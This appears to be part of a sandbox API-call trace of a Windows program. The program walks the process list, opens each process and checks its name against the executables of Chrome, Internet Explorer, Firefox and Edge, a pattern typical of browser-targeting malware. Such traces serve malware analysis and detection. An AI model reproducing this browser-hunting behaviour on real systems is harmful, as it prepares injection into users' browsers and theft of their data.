	[0243.783] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.784] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.784] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.784] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0243.785] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x8d64
	[0243.785] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.785] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0243.785] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.786] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.786] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0243.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.786] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.786] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.787] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x8d68
	[0243.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.787] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.788] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.788] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.788] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.788] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.788] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.788] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.789] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0243.789] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x8d6c
	[0243.789] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.789] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.790] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.790] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.790] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.791] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0243.791] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x8d70
	[0243.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.792] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0243.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.792] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.792] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0243.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.793] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.793] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.794] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x8d74
	[0243.794] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.794] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.795] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.795] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.796] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.796] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.796] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0243.797] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x8d78
	[0243.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.797] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0243.798] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.798] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.799] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.799] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0243.799] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.799] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.799] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0243.801] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x8d7c
	[0243.801] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.801] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0243.801] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.801] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.801] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.801] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0243.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.802] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.802] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0243.803] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x8d80
	[0243.803] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.804] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0243.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.804] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.804] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0243.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.804] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.805] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0243.806] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x8d84
	[0243.806] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.806] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0243.806] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.806] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.807] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.807] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0243.807] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.807] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.807] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0243.809] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0243.809] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0243.809] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x8d88
	[0243.810] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.810] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0243.811] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.811] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.811] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.811] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0243.812] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.812] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.813] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0243.815] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x8d8c
	[0243.815] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.815] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0243.816] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.816] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.816] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.816] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0243.817] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.817] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.817] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0243.818] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x8d90
	[0243.818] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.818] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0243.818] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.818] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.819] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.819] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0243.819] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.820] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.820] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0243.821] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x8d94
	[0243.821] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.821] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0243.821] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.821] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.822] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.822] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0243.822] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.822] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.822] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0243.823] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x8d98
	[0243.823] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.823] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0243.824] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.824] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.824] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.824] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0243.825] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.825] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.825] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0243.826] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x8d9c
	[0243.826] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.826] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0243.827] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.827] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.827] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.827] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0243.827] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.827] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.827] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0243.828] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x8da0
	[0243.828] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.828] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0243.829] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.829] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.829] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.829] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0243.830] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.830] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.830] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0243.831] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x8da4
	[0243.831] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.831] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0243.832] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.832] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.832] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.832] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0243.833] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.833] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.833] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0243.834] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x8da8
	[0243.834] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.834] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0243.834] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.834] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.835] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.835] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0243.835] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.835] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.835] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0243.836] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x8dac
	[0243.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.836] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0243.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.836] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.837] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.837] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0243.837] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.837] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.837] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0243.838] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x8db0
	[0243.838] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.838] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0243.838] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.838] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.839] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.839] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0243.839] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.839] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.840] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0243.841] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x8db4
	[0243.841] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.841] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0243.841] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.841] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.842] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.842] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0243.843] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.843] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.843] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0243.844] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x8db8
	[0243.844] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.844] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0243.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.845] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.846] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.846] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0243.846] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.846] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.846] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0243.847] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x8dbc
	[0243.847] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.847] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0243.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.848] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.849] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0243.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.849] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.850] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0243.851] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x8dc0
	[0243.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.851] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0243.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.851] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.852] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
